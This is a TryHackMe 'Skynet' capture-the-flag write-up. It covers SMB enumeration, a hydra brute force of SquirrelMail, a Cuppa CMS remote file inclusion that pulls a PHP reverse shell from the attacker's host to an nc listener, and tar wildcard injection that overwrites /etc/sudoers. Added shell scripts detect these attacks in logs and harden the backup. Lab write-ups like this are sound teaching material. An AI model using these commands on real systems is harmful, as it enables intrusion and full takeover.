Skynet | TryHackMe Challenge Writeup

Attila Csölle

Hello, fellow hackers!

In this write-up, I’ll walk you through my solution for an easy TryHackMe challenge called Skynet, which is themed around the Terminator universe.

You can find the challenge here. I recommend trying to solve it on your own first and using this write-up only if you get stuck — or feel free to follow along step by step.

The objective is simple: gain root access to the target machine.

Let’s get started. 💻🔥

🔍 Port Scanning with Nmap

First, we scan the target machine with Nmap to identify open ports and running services:

nmap -sV -sC -T4 -Pn 10.10.113.118

📋 Nmap Output (Trimmed & Highlighted)

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2
80/tcp  open  http        Apache httpd 2.4.18 (Ubuntu)
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu

At this point, we know the machine is running:

  • SSH – for secure shell access

  • HTTP – potentially a custom web app (we’ll investigate)

  • POP3/IMAP – may expose email credentials

  • Samba – might allow unauthenticated file share access

📂 Checking Samba Shares

Since Samba may allow access to shared files, we start there before exploring the web server — we might get lucky and find something useful.

We list the available shares:

smbclient -N -L //10.10.159.31/

Output:

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
anonymous       Disk      Skynet Anonymous Share
milesdyson      Disk      Miles Dyson Personal Share
IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))

The anonymous share looks interesting, so we connect:

smbclient -N //10.10.159.31/anonymous

We explore the contents:

smb: \> ls
  attention.txt
  logs/

smb: \> cd logs
smb: \logs\> ls
  log1.txt
  log2.txt
  log3.txt

We download attention.txt and log1.txt (the others are empty).

📄 attention.txt

A recent system malfunction has caused various passwords to be changed. All Skynet employees are required to change their password after seeing this.

- Miles Dyson

📄 log1.txt (Password List)

cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
...
Walterminator
79terminator6
1996terminator

🧠 Analysis

We now know:

  • There's been a password reset.

  • We've recovered a potential wordlist (probably auto-generated passwords).

  • The first challenge question is:
    "What is Miles' password for his emails?"

Naturally, you might try brute-forcing:

  • IMAP or POP3 logins using milesdyson

  • Or accessing the milesdyson Samba share

But I’ll save you some time — I tried them all, and had no luck. So the correct path forward lies elsewhere — maybe the web service can give us more clues 👀

🌐 Exploring the Website

The main webpage doesn’t reveal much — just a basic search bar with Skynet Search and an I’m Feeling Lucky button. Pretty minimal, so it’s time to start digging for hidden directories.

🔍 Gobuster Scan

gobuster dir -u http://10.10.159.31 -w Tools/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

Results:

/admin                (Status: 301)
/css                  (Status: 301)
/js                   (Status: 301)
/config               (Status: 301)
/ai                   (Status: 301)
/squirrelmail         (Status: 301)
/server-status        (Status: 403)

Interesting find — /squirrelmail. That looks like a webmail client. Since the second challenge question is "What is the hidden directory?", this seems promising... but spoiler: squirrelmail is not the correct answer to that one (you’ll find it later 😉). Still, it might help us progress in the challenge.

Navigating to /squirrelmail gives us a login screen — time to brute-force it using our earlier wordlist.

🔐 Brute-forcing SquirrelMail Login

Let’s try logging in as Miles Dyson with the wordlist we pulled from log1.txt:

hydra -l milesdyson -P log1.txt 10.10.159.31 http-post-form \
"/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=Unknown" -V

And boom 💥 — we get a valid login:

[80][http-post-form] host: 10.10.159.31   login: milesdyson   password: **********

(🔒 Password redacted for you to find on your own 😉)

📬 Inside the Inbox

Once logged in, you’ll find three emails. The first one is gold — it confirms that Miles’ Samba share password was changed, and the new password is right there in plain text.

With this new password, we can now access the protected milesdyson Samba share. Let’s move on and see what goodies we find inside. 🕵️‍♂️

🧠 Revisiting Samba

We’re back at it with the Samba share, now armed with the credentials we snagged from that SquirrelMail inbox.

smbclient //10.10.159.31/milesdyson -U milesdyson

After logging in, we check the file list:

Improving Deep Neural Networks.pdf
Natural Language Processing-Building Sequence Models.pdf
Convolutional Neural Networks-CNN.pdf
Neural Networks and Deep Learning.pdf
Structuring your Machine Learning Project.pdf
notes/

Looks like Miles is knee-deep in machine learning studies. But the real treasure is probably not inside academic PDFs — let’s check that notes/ directory.

Jackpot: Among all the markdown files, one stands out like a sore thumb… important.txt

Contents:

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

Welp, we found our hidden directory:
👉 /45kra24zxs28v3yd

🕳️ Down the Rabbit Hole

Of course, the first thing I did was what any of us would do: look for even more hidden folders inside the hidden folder. Classic move. Eventually, I stumbled upon an admin panel that had:

  • A login form ✅

  • A reset password function ✅

Naturally, I thought I was onto something big... and then boom, hit a wall.

Not gonna lie — I burned a lot of time down this path before I had to sneak a peek at this write-up. Turns out I was completely off-track with my solution. 😅

⚙️ Exploiting the CMS

So, the hidden site we found earlier is running Cuppa CMS.

After a bit of Googling, I discovered that this CMS is vulnerable to a Remote File Inclusion (RFI) attack — and that answers our third question. The exploit can be found here.

Using this vulnerability, we can include a malicious PHP file like a reverse shell from our own server. I used this online reverse shell generator to whip one up.

🔧 Steps to Exploit

  1. Create a folder on your machine and drop your PHP reverse shell inside it.

  2. Serve it using Python:

     python3 -m http.server 8000
    
  3. Start your listener on another terminal:

     nc -lvnp 4444
    
  4. Trigger the RFI vulnerability using a crafted URL that points to your malicious PHP file:

     http://<TARGET_IP>/vulnerable_page.php?language=http://<YOUR_IP>:8000/shell.txt
    

And we get a shell as www-data.
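Both the Hydra run against SquirrelMail and the RFI request in step 4 leave a distinct trace in the Apache access log. As an added example that is not part of the write-up, this script flags both patterns over constructed log lines; the client addresses, the 203.0.113.9 host and the vulnerable_page.php path are sample values, not the challenge box.

```shell
#!/bin/sh
# Added example (not from the write-up): spot repeated login POSTs and
# URL-valued query parameters in an Apache combined-format access log.
# Every line below is constructed sample data.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
10.0.0.5 - - [17/Sep/2019:10:00:01 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "-"
10.0.0.5 - - [17/Sep/2019:10:00:01 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "-"
10.0.0.5 - - [17/Sep/2019:10:00:02 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "-"
10.0.0.5 - - [17/Sep/2019:10:00:02 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "-"
10.0.0.5 - - [17/Sep/2019:10:00:03 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "-"
10.0.0.5 - - [17/Sep/2019:10:00:03 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "-"
10.0.0.8 - - [17/Sep/2019:10:05:10 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "-"
10.0.0.8 - - [17/Sep/2019:10:05:11 +0000] "GET /squirrelmail/src/webmail.php HTTP/1.1" 200 4123 "-" "-"
203.0.113.9 - - [17/Sep/2019:10:09:00 +0000] "GET /45kra24zxs28v3yd/index.php HTTP/1.1" 200 812 "-" "-"
203.0.113.9 - - [17/Sep/2019:10:09:30 +0000] "GET /45kra24zxs28v3yd/vulnerable_page.php?language=http://203.0.113.9:8000/shell.txt HTTP/1.1" 200 0 "-" "-"
203.0.113.9 - - [17/Sep/2019:10:09:40 +0000] "GET /45kra24zxs28v3yd/vulnerable_page.php?language=http%3A%2F%2F203.0.113.9%3A8000%2Fshell.txt HTTP/1.1" 200 0 "-" "-"
EOF

# login_bursts LOG [THRESHOLD]: print "ip count" for each client that POSTed to
# the SquirrelMail login handler more than THRESHOLD times (default 10).
# In the combined format $1 is the client IP, $6 the quoted method, $7 the path.
login_bursts() {
    awk -v thr="${2:-10}" '
        $6 == "\"POST" && index($7, "/squirrelmail/src/redirect.php") == 1 { n[$1]++ }
        END { for (ip in n) if (n[ip] > thr) print ip, n[ip] }' "$1"
}

# remote_includes LOG: print "ip path" for requests whose query string hands a
# URL (raw or percent-encoded) to some parameter, the shape of an RFI attempt.
remote_includes() {
    awk '$7 ~ /[?&][^=&]+=(https?|ftp)(:\/\/|%3[Aa]%2[Ff]%2[Ff])/ { print $1, $7 }' "$1"
}

echo "== login bursts (>5 attempts) =="; login_bursts "$SAMPLE_LOG" 5
echo "== remote include attempts =="; remote_includes "$SAMPLE_LOG"
```

The threshold is per log file, so on a real server pair this with a time window (for example by first filtering on the timestamp field) before alerting.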

Tip: Don’t forget to stabilize your shell — drop into a proper TTY:

🧑‍💻 User Flag

We're www-data, but luckily the user flag is world-readable — so that’s a quick win. 🎉

🧨 Privilege Escalation

Looking around, we find something juicy:

ls -al /home/milesdyson/backups/backup.sh

Output:

-rwxr-xr-x 1 root root 74 Sep 17  2019 /home/milesdyson/backups/backup.sh

Contents:

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

We can't modify the script itself — it’s root-owned.
But... we can write to /var/www/html. Suspicious.

Time to check the crontab:

crontab -l

Sure enough:

*/1 * * * * root /home/milesdyson/backups/backup.sh

It runs every minute! ⏱️

🔥 Wildcard Privilege Escalation (via tar)

This one uses a known trick: tar wildcard injection.
Basically, the shell expands the * into the file names in the directory, and tar treats any name that looks like an option as an option, so by creating the right file names we can inject a command into the backup process. You can read more about it here.

💣 Here’s How:

  1. Navigate to /var/www/html:

  2. Inject tar options:

     echo "" > --checkpoint=1
     echo "" > --checkpoint-action=exec=sh\ privesc.sh
    
  3. Create the payload script:

     nano privesc.sh
    

    Contents:

     echo 'www-data ALL=(ALL) NOPASSWD: ALL' > /etc/sudoers
    
  4. Wait a minute, let cron do its thing.

  5. Get root:

     sudo su
    

And now you’re root. Final flag is in /root.
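The root cause is a root cron job that globs a directory www-data can write to. As an added example (not the challenge's backup.sh), this script shows a version of the backup that file names cannot steer, plus a check that flags option-shaped names in the web root as an indicator worth alerting on; the scratch directory and its files are constructed.

```shell
#!/bin/sh
# Added example, not the challenge's backup.sh: a hardened backup and a
# pre-flight check for option-shaped file names. All paths are scratch values.

# option_like_names DIR: print entries of DIR whose names begin with '-',
# which a shell glob would hand to tar as options. Exit 0 if any exist
# (an indicator worth alerting on in a web root), 1 if none.
option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' | grep .
}

# safe_backup SRC DEST: archive SRC without the file list ever passing through
# a shell glob. '-C SRC' plus '.' archives the directory itself, and '--' ends
# option parsing, so a member called --checkpoint=1 is just a file to tar.
# (The original was: cd /var/www/html; tar cf backup.tgz *)
safe_backup() {
    tar -C "$1" -cf "$2" -- .
}

# Demo on a constructed scratch directory: one normal file and two files
# whose names mimic the tar options abused in the write-up.
demo_dir=$(mktemp -d); demo_tar=$(mktemp)
trap 'rm -rf "$demo_dir" "$demo_tar"' EXIT
echo '<?php echo "hi";' > "$demo_dir/index.php"
: > "$demo_dir/--checkpoint=1"
: > "$demo_dir/--checkpoint-action=exec=sh privesc.sh"

if option_like_names "$demo_dir"; then
    echo "warning: option-shaped names found in $demo_dir" >&2
fi
safe_backup "$demo_dir" "$demo_tar"
tar -tf "$demo_tar"   # the two option-shaped names appear as plain members
```

The same split applies to the cron side: a root job should never read from a directory that a lower-privileged service account can write to, regardless of how carefully tar is invoked.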

💭 Final Thoughts

This challenge was an absolute blast! It was a rollercoaster, combining everything from enumeration and brute-forcing to vulnerability research and privilege escalation. Each phase kept me on my toes, and it was one of the most rewarding machines I’ve done on TryHackMe.

I’ve learned a lot along the way, especially when it comes to discovering hidden directories, exploiting RFI vulnerabilities, and how to use tar wildcard injection for privilege escalation — something I hadn’t really played with before. It's safe to say that this challenge stretched my skills and knowledge to the limit.

💡 Takeaways:

  • Enumeration is king: From discovering hidden directories to finding useful files, taking the time to enumerate thoroughly paid off big time.

  • Brute force isn’t always the best option, but when you’ve exhausted other paths, it can sometimes lead you to a breakthrough.

  • RFI and reverse shells: It’s always great to revisit old tricks like RFI and shell uploading, but knowing how to generate a reverse shell is key to exploiting many web vulnerabilities.

  • Privilege escalation is all about creativity: The wildcard exploit with tar was a game-changer. A simple but incredibly effective trick for escalating privileges in Linux environments.

🔗 Resources Used

Here are the resources that helped me throughout the journey:

Written by Attila Csölle

Hi there! I'm a civil engineer driven by curiosity and a passion for technology. I'm currently diving into the world of cybersecurity, exploring digital threats and ethical hacking. Although I'm just starting out, I'm fully committed to learning, upskilling, and gaining hands-on experience as I grow in this exciting field.